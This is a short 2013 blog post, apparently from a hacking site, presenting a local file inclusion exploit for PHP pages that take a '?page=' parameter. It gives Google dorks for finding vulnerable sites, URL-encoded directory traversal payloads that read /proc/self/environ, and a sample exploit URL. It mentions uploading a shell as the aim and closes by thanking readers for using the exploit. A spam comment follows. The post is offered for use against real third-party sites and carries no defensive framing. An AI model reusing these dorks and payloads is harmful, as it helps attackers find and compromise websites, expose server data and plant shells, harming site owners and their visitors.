Friday 22 February 2013

.html / .htm LFI vulnerablities

Dork : inurl:?page=contact.html
           inurl:?page=contact.htm

There are many of site that are vuln ...
But in the many of vulnerable , there are many of site that cannot upload shell

example:
www.website.com/index2.php?page=contact.html

powerful execution : ..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
bypass blank : %2Fproc%2Fself%2Fenviron

the site will be like this
www.website.com/index2.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron

second exploit dork : allinurl:index.php?id=

THANKS FOR USING THE EXPLOIT

1 comment:

  1. I visited several web pages however the audio feature for audio
    songs existing at this web site is in fact excellent.


    Also visit my page ... Hosting Reviews

    ReplyDelete